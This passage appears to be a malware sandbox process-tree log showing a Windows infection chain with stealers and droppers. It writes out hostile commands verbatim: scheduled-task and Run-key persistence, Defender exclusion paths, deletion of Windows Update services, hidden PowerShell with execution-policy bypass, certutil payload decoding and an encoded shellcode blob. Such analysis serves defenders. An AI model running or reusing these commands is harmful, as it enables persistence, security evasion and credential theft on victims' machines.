C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:R" /E7⤵
-
C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 12807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 12887⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000051001\Player3.exe"C:\Users\Admin\AppData\Local\Temp\1000051001\Player3.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E9⤵
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main8⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main9⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4280 -s 68010⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exe"C:\Users\Admin\AppData\Roaming\nsis_unse5708f9.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8Gn7AHMfAEwAdQBX|wBIADEAOAB4vh8ATQBJAEEtAln|SIPsKOgEAgD|AEiDxCjDzMz|zEyJRCQYSIn|VCQQSIlMJAj+XQFIi0QkMEiJ2wQkgQE4SG8ACEhvx0QkEC0B6w6BAV8QSIPAAY8BEIEBt0BIOZYAcyWfA4v|DCRIA8hIi8HXSItMqwFUewAD0f9Ii8qKCYgI6|3BZgVlSIsEJWD+8|AzyUiLUBhI|zvRdDZIg8Ig|0iLAkg7wnQq|2aDeEgYdRpM|4tAUGZBgzhru3QHERFLdQgREHj|EC50BUiLAOuv1UiLSP0AwWoAQP9TVVZXQVRBVe9BVkFXXQFmgTn|TVpNi|hMi|K|SIvZD4X88|BM|2NJPEGBPAlQv0UAAA+F6vPwQe+LhAmI8|CFwEi|jTwBD4TWahGDd7wJjC0BD4TH8|D|RItnIESLXxz|i3ckRItPGEz|A+FMA9lIA|H|M8lFhckPhKT+8|BNi8RBixBF|zPSSAPTigKE|8B0HUHByg0Pe77A+gABRAPQvxH|dexBgfqq|A3|fHQOg8EBSYP|wARBO8lzaev|xovBD7cMTkX|iyyLTAPrdFj7M+2qEHRRQYsU|sEA0zPJigJMi9|C6w|BycgRA8je5RABQYoA1RDtM3|AM|ZBOwy24BD+pgCDxgGD+Ahy|+7rCkiLy0H|f9VJiQT3g8XkEH|EBDtvGHKvZgH|QV9BXkFdQVzvX15dWzMXSIHs+2ABZACL6ehm|v|||0iFwA+EmNZ1IEyNrwGLKxDIM|f|6Jt9II1fBEz|jUVGM9KLy||3VCRogCBMi+AP64RrdSBFqBAzwIt905EgSIl8JCCmIP1wgCBIi|APhEv8dSCmIFBIjVYIRH+NR0BIjYwkhRG|SIvY6Hz9fiCNq1ZI3iAQ4iHM8|Do|WfvIESLBo1XCPRBIKYgWMohiYQkgNqHEt7z8IsO2iBYiWOMJHERBzCRIOgx7yD7i5wtMkyLXTpI74P7bEiKIDBMib9kJDhMi6QaMky7iVyEAYQk3IcRhu2SjRGNR0swjCTwfvPwSYvU6On8BTC7ipx4MkiNhHgyQf+A8yGNT2xEMP0YpAKD6QF184H9vHgyIVJleHVN74uEJPQiMZQk+P41AcJIO9hyOIP|+mx2M0SNSUCe+gCUQbgAmACmIECeyiL4dBlEtjDAMUnvjVQkbJEgSYPod2zoa4IwSIvOpiD|eEiF|3QSi1XzQkyOMBsxSI1MJD9A|9dIgcR0IWEkAC0ILQE=7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2948 -s 2968⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 7087⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exeC:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exe /TH_ID=_1772 /OriginExe="C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\CmD.exeC:\Windows\system32\CmD.exe /c cmd < 808⤵
-
C:\Windows\SysWOW64\cmd.execmd9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avastui10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avgui10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\certutil.execertutil -decode 5 5fbHlM10⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^BYLhzgJfvHMGFGbkIYAzlXUMcmgLOfzNNBjXWVOwahotMobsaoVUFcQEtYSUZYBuhYTtzmgNlmwWOQZjwXaFxnosKI$" 5fbHlM10⤵
-
C:\Users\Admin\AppData\Local\Temp\q25jy1i2.aam\18931\Russian.exe.pif18931\\Russian.exe.pif 18931\\N10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\q25jy1i2.aam\18931\Russian.exe.pif" & exit11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 612⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 1810⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\a7e592f1-b46b-45d4-965a-f2891e354357" /deny *S-1-1-0:(OI)(CI)(DE,DC)8⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe" --Admin IsNotAutoStart IsNotTask8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe" --Admin IsNotAutoStart IsNotTask9⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 162012⤵
- Program crash
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build3.exe"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build3.exe"10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000119001\jn-17L.exe"C:\Users\Admin\AppData\Local\Temp\1000119001\jn-17L.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -windowstyle hidden -file "C:\Users\Admin\AppData\Local\Temp\xtt8wcvtp7dg8v5p6khamra6v9xtaykn.ps1"7⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000122001\LummaC2.exe"C:\Users\Admin\AppData\Local\Temp\1000122001\LummaC2.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe"C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 19927⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main7⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3512 -s 6848⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\1000009001\fular.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\fular.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000010001\fular1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\fular1.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 12325⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000011001\vina.exe"C:\Users\Admin\AppData\Local\Temp\1000011001\vina.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1000012000\vina1.exe"C:\Users\Admin\AppData\Roaming\1000012000\vina1.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\9308.exeC:\Users\Admin\AppData\Local\Temp\9308.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 237714⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 5483⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
C:\Windows\SysWOW64\fontview.exe"C:\Windows\SYSWOW64\fontview.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2332 -ip 23321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2332 -ip 23321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3200 -ip 32001⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4844 -ip 48441⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4784 -ip 47841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4976 -ip 49761⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 432 -ip 4321⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 2948 -ip 29481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2376 -ip 23761⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2220 -ip 22201⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 3512 -ip 35121⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService1⤵
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 4280 -ip 42801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2656 -ip 26561⤵
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
